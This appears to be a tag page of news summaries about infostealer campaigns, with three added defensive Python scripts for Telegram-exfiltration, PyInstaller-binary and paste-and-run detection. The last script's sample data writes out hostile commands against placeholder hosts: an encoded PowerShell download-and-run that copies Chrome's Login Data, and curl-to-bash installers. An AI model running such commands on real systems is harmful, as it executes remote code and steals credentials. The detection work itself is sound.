12 links
tagged with all of: malware + infostealer
Links
Threat actors are distributing a fraudulent PDF editing application named AppSuite PDF Editor that delivers the TamperedChef infostealer. The campaign, promoted through Google ads and signed with fraudulent certificates, was run to maximize downloads before the malicious components were activated to collect sensitive data and turn infected systems into residential proxies. Researchers warn that the operation involves multiple apps, some potentially not yet weaponized, posing an ongoing risk to users.
Trellix's Advanced Research Center has uncovered a previously undocumented infostealer named Myth Stealer, written in Rust and marketed on Telegram since late December 2024. The malware specifically targets gamers, raising concerns about the security of the gaming community.
Over 4,000 victims in 62 countries have been hit by the PXA Stealer malware, which has stolen hundreds of credit card numbers, 200,000 passwords, and over 4 million browser cookies. This Python-based infostealer is delivered through sophisticated phishing lures and has evolved to evade detection, exfiltrating stolen data over Telegram and feeding Telegram-based marketplaces.
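Telegram-bot exfiltration, as in the PXA Stealer campaign above, leaves a recognisable trace in egress logs: an HTTPS request to api.telegram.org/bot<token>/<method>. The legitimate Telegram desktop client does not use that endpoint, so bot-API uploads from user workstations deserve a look. The following is an added example of that check written for this page, not code from the PXA Stealer research or any vendor; the proxy log format, IPs and bot tokens are constructed, and the token shape (numeric bot id, colon, secret) is the only Telegram detail relied on.

```python
"""Flag Telegram Bot API traffic in a constructed egress/proxy log."""
import re
from typing import Dict, List

# Constructed proxy log: timestamp, client IP, method, URL, status, bytes sent.
# Tokens below are made up and have no relation to any real bot.
PROXY_LOG = """\
2025-08-01T10:00:01Z 10.0.0.5 GET https://example.com/index.html 200 1204
2025-08-01T10:00:07Z 10.0.0.5 POST https://api.telegram.org/bot7312345678:AAFakeTokenForExampleOnly00000000000/sendDocument 200 483219
2025-08-01T10:00:09Z 10.0.0.5 POST https://api.telegram.org/bot7312345678:AAFakeTokenForExampleOnly00000000000/sendMessage 200 512
2025-08-01T10:03:44Z 10.0.0.9 GET https://web.telegram.org/k/ 200 20331
2025-08-01T10:05:12Z 10.0.0.12 POST https://api.telegram.org/bot1122334455:ZZAnotherConstructedTokenValue0000000/sendDocument 200 2097152
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")
# Bot API URL: numeric bot id, colon, secret (real secrets are ~35 chars).
BOT_API = re.compile(r"https://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{30,})/(\w+)")
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}


def find_bot_exfil(log_text: str) -> List[Dict[str, object]]:
    """Return one record per request to the Telegram Bot API."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than fail the whole run
        ts, src, _method, url, _status, nbytes = m.groups()
        b = BOT_API.search(url)
        if not b:
            continue
        bot_id, secret, api_method = b.groups()
        hits.append({
            "ts": ts,
            "src": src,
            "bot_id": bot_id,
            # Never log the full token; a fingerprint is enough to correlate.
            "token_fingerprint": secret[:4] + "..." + secret[-4:],
            "api_method": api_method,
            "bytes": int(nbytes),
            "upload": api_method in UPLOAD_METHODS,
        })
    return hits


def summarize_by_source(hits: List[Dict[str, object]]) -> Dict[str, Dict[str, object]]:
    """Aggregate per client IP: bytes sent, distinct bots, upload count."""
    summary: Dict[str, Dict[str, object]] = {}
    for h in hits:
        s = summary.setdefault(h["src"], {"bytes": 0, "bots": set(), "uploads": 0})
        s["bytes"] += h["bytes"]
        s["bots"].add(h["bot_id"])
        s["uploads"] += 1 if h["upload"] else 0
    return summary


if __name__ == "__main__":
    for src, s in summarize_by_source(find_bot_exfil(PROXY_LOG)).items():
        print(src, s["bytes"], "bytes to bots", sorted(s["bots"]), "uploads:", s["uploads"])
```

Upload methods with large byte counts are the interesting rows; sendMessage alone is often a beacon. The web.telegram.org line is deliberately left unflagged, since browser use of Telegram is not evidence of exfiltration.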
A malicious campaign is targeting macOS developers through fake Homebrew, LogMeIn, and TradingView platforms that distribute infostealing malware such as AMOS and Odyssey. The campaign uses deceptive tactics to trick users into executing harmful commands in Terminal, leading to the theft of sensitive information from their systems. Researchers identified over 85 domains involved in this scheme, which are promoted via Google Ads to appear in search results.
A malware campaign targeting Minecraft players has been uncovered, in which malicious mods and cheats infect Windows devices with infostealers that steal credentials, authentication tokens, and cryptocurrency wallets. Run by the Stargazers Ghost Network, the operation uses GitHub to distribute fake mods, reaching thousands of potential victims while evading antivirus detection. Players are advised to download mods only from reputable sources and to treat GitHub links with caution.
A hacker known as EncryptHub has compromised the early access game Chemia on Steam by injecting info-stealing malware into its files, specifically the HijackLoader and Fickle Stealer. The malware operates in the background, allowing it to harvest sensitive data from users while remaining undetected during gameplay. Users are advised to avoid downloading the game until further notice from the developer or Steam, as it remains unclear if the current version is safe.
Jamf Threat Labs has identified a new technique in which attackers use PyInstaller to bundle Python-based infostealers into Mach-O executables on macOS. Bundling this way lets the malware run without a Python interpreter installed on the victim's machine, and the samples employ various obfuscation tactics to evade detection. The analysis includes dynamic and static examination of these binaries, revealing behaviors consistent with infostealer activity.
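A quick static check for the bundling described above is to confirm the Mach-O header and then look for PyInstaller's CArchive cookie, which the bootloader locates near the end of the file. The script below is an added example written for this page, not Jamf Threat Labs' tooling; the cookie layout follows PyInstaller's own CArchiveReader ("!8sIIii64s": magic, package length, TOC offset, TOC length, Python version, libpython name), and the sample bytes are constructed rather than taken from a real sample.

```python
"""Static triage for PyInstaller-bundled Mach-O binaries (constructed input)."""
import struct
from typing import Dict, Optional

# Mach-O magics as the first four bytes appear on disk.
# Caveat: the fat/universal magic 0xcafebabe is shared with Java class files.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit (big-endian)",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit (little-endian)",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit (big-endian)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit (little-endian)",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat) binary",
}

# First 8 bytes of PyInstaller's CArchive cookie.
PYINSTALLER_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset, TOC length, python version, libpython name
COOKIE_FORMAT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)  # 88 bytes


def classify_macho(data: bytes) -> Optional[str]:
    """Describe the Mach-O header, or None if the file is not Mach-O."""
    return MACHO_MAGICS.get(data[:4])


def find_pyinstaller_cookie(data: bytes) -> Optional[int]:
    """Offset of the last cookie magic in the file, or None."""
    offset = data.rfind(PYINSTALLER_COOKIE_MAGIC)
    return None if offset == -1 else offset


def parse_cookie(data: bytes, offset: int) -> Optional[Dict[str, object]]:
    """Unpack the cookie at offset; None if the file is truncated there."""
    blob = data[offset:offset + COOKIE_SIZE]
    if len(blob) != COOKIE_SIZE:
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(COOKIE_FORMAT, blob)
    return {
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        # PyInstaller stores major*100 + minor, e.g. 312 for Python 3.12.
        "python_version": "%d.%d" % (pyvers // 100, pyvers % 100),
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", errors="replace"),
    }


def triage(data: bytes) -> Dict[str, object]:
    """Combine both indicators into one verdict for a file image."""
    fmt = classify_macho(data)
    offset = find_pyinstaller_cookie(data)
    cookie = parse_cookie(data, offset) if offset is not None else None
    return {
        "mach_o": fmt,
        "pyinstaller_cookie_offset": offset,
        "cookie": cookie,
        "suspect_pyinstaller_macho": fmt is not None and cookie is not None,
    }


def constructed_sample() -> bytes:
    """Stand-in for a bundled binary: 64-bit LE Mach-O magic, filler, then a cookie."""
    cookie = struct.pack(COOKIE_FORMAT, PYINSTALLER_COOKIE_MAGIC,
                         4096, 3000, 512, 312, b"libpython3.12.dylib")
    return b"\xcf\xfa\xed\xfe" + b"\x00" * 200 + cookie


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_sample()
    print(triage(blob))
```

Run it against a file path to triage a real binary, or with no arguments to see the constructed case. A hit on both indicators only says "Python frozen with PyInstaller"; plenty of legitimate software ships that way, so the next step is extracting the archive and reading the bundled scripts.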
Elastic Security Labs reports on the misuse of SHELLTER, a commercial evasion framework, by threat groups for infostealer campaigns since April 2025. The framework's advanced capabilities allow malicious actors to evade detection by anti-malware solutions, prompting the release of a dynamic unpacker by Elastic Security Labs to analyze SHELLTER-protected binaries. Key features include polymorphic obfuscation, payload encryption, and mechanisms to bypass detection systems.
More than 31,000 banking passwords from Australian customers of major banks have been stolen and are being traded online, primarily due to malware infections on users' devices. Cybersecurity experts warn that these stolen credentials pose a significant risk of financial theft, as infostealer malware can capture a wide range of sensitive information. The rise in infostealer infections highlights the ongoing threat to personal security and the need for effective protective measures.
A recent incident involving the LUMMA infostealer highlighted an attack method in which users were directed to a fake CAPTCHA page that led to the execution of PowerShell commands targeting sensitive browser data from Microsoft Edge and Google Chrome. NCC Group's DFIR team documented the timeline of events, including the initial access method and the various tactics the malware used to steal credentials.
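The fake-CAPTCHA chain above and the fake-Homebrew campaign against macOS developers share one pattern: the victim is talked into pasting a command that pulls and runs remote content. Both leave a process-creation event that can be scored. The following is an added example of such detection logic, written for this page and not taken from NCC Group, Jamf or any of the campaigns' research; the events are constructed, with field names modelled on what Sysmon Event ID 1 and EDR telemetry carry (parent image, image, command line), and the allowlist of installer hosts is an assumption to tune per environment.

```python
"""Score copy-paste-and-run launches (Windows PowerShell and macOS shell)."""
import base64
import re
from typing import Dict, List, Optional

# -enc/-e/-EncodedCommand followed by a base64 blob.
PS_ENCODED = re.compile(r"(?i)(?:^|\s)-(?:enc(?:odedcommand)?|e|ec)\s+([A-Za-z0-9+/=]{16,})")
PS_SUSPECT = re.compile(
    r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|\biex\b|invoke-expression"
    r"|\birm\b|invoke-restmethod|downloadstring")
BROWSER_STORE = re.compile(
    r"(?i)(?:google\\chrome|microsoft\\edge)\\user data|login data|\bcookies\b|web data")
CURL_TO_SHELL = re.compile(
    r"(?i)curl\b[^|]*\|\s*(?:ba|z)?sh\b|\$\(\s*curl\b|base64\s+(?:-d|-D|--decode)\s*\|\s*(?:ba|z)?sh\b")
URL_HOST = re.compile(r"https?://([^/\s\"')]+)")
# Assumed allowlist for curl-to-shell installers; adjust for your estate.
TRUSTED_INSTALL_HOSTS = {"raw.githubusercontent.com"}


def encode_powershell(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -enc/-e/-EncodedCommand, or None."""
    m = PS_ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Return findings for one process-creation event; score = number of findings."""
    image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmdline"]
    findings: List[str] = []
    if image in {"powershell.exe", "pwsh.exe"}:
        if parent == "explorer.exe":
            findings.append("PowerShell spawned by explorer.exe (Win+R Run dialog pattern)")
        if PS_SUSPECT.search(cmd):
            findings.append("hidden-window / bypass / download-and-execute flags")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded command present")
            if BROWSER_STORE.search(decoded):
                findings.append("decoded script touches Chrome/Edge credential store")
    elif image in {"bash", "zsh", "sh"} and CURL_TO_SHELL.search(cmd):
        hosts = set(URL_HOST.findall(cmd))
        if not hosts or not hosts <= TRUSTED_INSTALL_HOSTS:
            findings.append("remote or decoded content piped into a shell from %s"
                            % (", ".join(sorted(hosts)) or "no visible URL"))
    return {"host": ev["host"], "score": len(findings), "findings": findings}


def run_detection(events: List[Dict[str, str]]) -> Dict[str, Dict[str, object]]:
    return {ev["host"]: score_event(ev) for ev in events}


# Constructed sample telemetry (hosts, paths and URLs are made up).
_FAKE_CAPTCHA_SCRIPT = (
    "$u='https://captcha-verify.example/verify.ps1';iex (irm $u);"
    "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" $env:TEMP")
_B64_ONELINER = base64.b64encode(b"curl -s https://example.invalid/a | bash").decode("ascii")
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TERMINAL = "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"
EVENTS = [
    {"host": "WIN-01", "parent": r"C:\Windows\explorer.exe", "image": POWERSHELL,
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc " + encode_powershell(_FAKE_CAPTCHA_SCRIPT)},
    {"host": "WIN-02", "parent": r"C:\Windows\System32\cmd.exe", "image": POWERSHELL,
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"host": "MAC-01", "parent": TERMINAL, "image": "/bin/bash",
     "cmdline": '/bin/bash -c "$(curl -fsSL https://brew-installer.example/install.sh)"'},
    {"host": "MAC-02", "parent": TERMINAL, "image": "/bin/bash",
     "cmdline": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'},
    {"host": "MAC-03", "parent": TERMINAL, "image": "/bin/zsh",
     "cmdline": "echo %s | base64 -D | bash" % _B64_ONELINER},
]

if __name__ == "__main__":
    for host, result in run_detection(EVENTS).items():
        print(host, result["score"], result["findings"])
```

Decoding the -enc payload is the step that separates "someone ran an encoded command" from "someone ran a command that reads the Chrome Login Data database", which is what the LUMMA case turned on. The allowlist keeps the genuine Homebrew one-liner quiet while the look-alike host and the base64-decoded pipeline both fire.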
Hackers have used a leaked copy of Shellter Elite, a commercial AV/EDR evasion tool, to deploy infostealer malware, the first known misuse since the vendor introduced its strict licensing model. Although the malicious activity had been ongoing since April, Elastic Security Labs, which tracked it, did not notify Shellter before disclosing; the misuse was later confirmed and detections were developed for the affected version. Shellter has since released an updated version to vetted customers, excluding the customer responsible for the leak.
Hackers are abusing the open-source RedTiger tool to build an infostealer that targets Discord accounts, collecting sensitive data such as credentials, payment information, and personal files. The malware works by injecting JavaScript into the Discord client and harvesting information from both the application and the victim's web browser. Users are advised to be cautious and take protective measures against this threat.